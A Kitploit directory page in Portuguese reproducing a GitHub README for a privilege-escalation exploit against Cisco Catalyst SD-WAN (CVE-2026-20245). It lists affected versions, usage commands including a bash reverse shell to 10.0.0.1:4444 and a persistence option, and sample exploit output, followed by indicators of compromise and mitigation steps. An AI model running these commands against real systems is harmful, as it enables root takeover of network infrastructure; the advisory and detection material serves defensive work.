Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de RedeTestes de PenetraçãoComando e ControleAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**Este código é SOMENTE para fins educativos e testes de segurança autorizados.**

Ver Repositório
34há 3 mesesAinda não revisado

CVE-2026-20245 - Exploit de Escalada de Privilégios no Cisco SD-WAN

Security Rating CVSS CISA KEV

⚠️ AVISO

Este código é SOMENTE para fins educativos e testes de segurança autorizados.

📋 Descrição

CVE-2026-20245 é uma vulnerabilidade de escalada de privilégios na CLI do Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) e Cisco Catalyst SD-WAN Validator (vBond). Um atacante autenticado com privilégios netadmin pode executar comandos arbitrários como root através do upload de um arquivo especialmente criado.

Detalhes Técnicos

CampoValor
CVECVE-2026-20245
CVSS7.8 (High)
VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ComponenteCLI / CSV Upload
TipoCommand Injection (CWE-116)

🎯 Versões Afetadas

ProdutoVersões vulneráveis
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

Versões específicas vulneráveis:

  • 20.9.x (todas)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 Instalação

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos
chmod +x exploit.py
📦 Dependências
txt
requests>=2.31.0
🚀 Uso
Verificar versão
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
Executar comando
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
Reverse shell
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Instalar persistência
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 Saída esperada
text
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 Indicadores de Comprometimento (IOCs)
Verificar em logs (/var/log/scripts.log)
bash
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Arquivos suspeitos
/home/admin/*.csv (arquivos CSV não autorizados)

/tmp/*.csv

/var/log/scripts.log com entradas incomuns

Processos
bash
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ Mitigação
Opção 1 - Atualizar para a versão corrigida (RECOMENDADO)
Versão	Fixed Release
20.18.2.1 e anteriores	20.18.3.1
Opção 2 - Limitar acesso
Restringir acesso administrativo à rede de gestão

Usar autenticação multifator

Monitorar atividade de upload de CSV

Opção 3 - Configuração segura
text
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers

# Limitar privilegios netadmin
admin privilege restrict
📚 Referências
Cisco Security Advisory

NVD - CVE-2026-20245

CISA KEV Catalog

📊 Linha do Tempo
Data	Evento
2026-05-14	Cisco publica aviso inicial
2026-06-04	CVE publicado oficialmente
2026-06-09	CISA adiciona ao KEV
2026-06-23	Prazo da CISA para aplicar o patch
⚖️ Aviso Legal
Este software é fornecido "como está", sem garantias. O autor não é responsável pelo uso indevido. Use-o apenas em sistemas autorizados.
Baixar ferramenta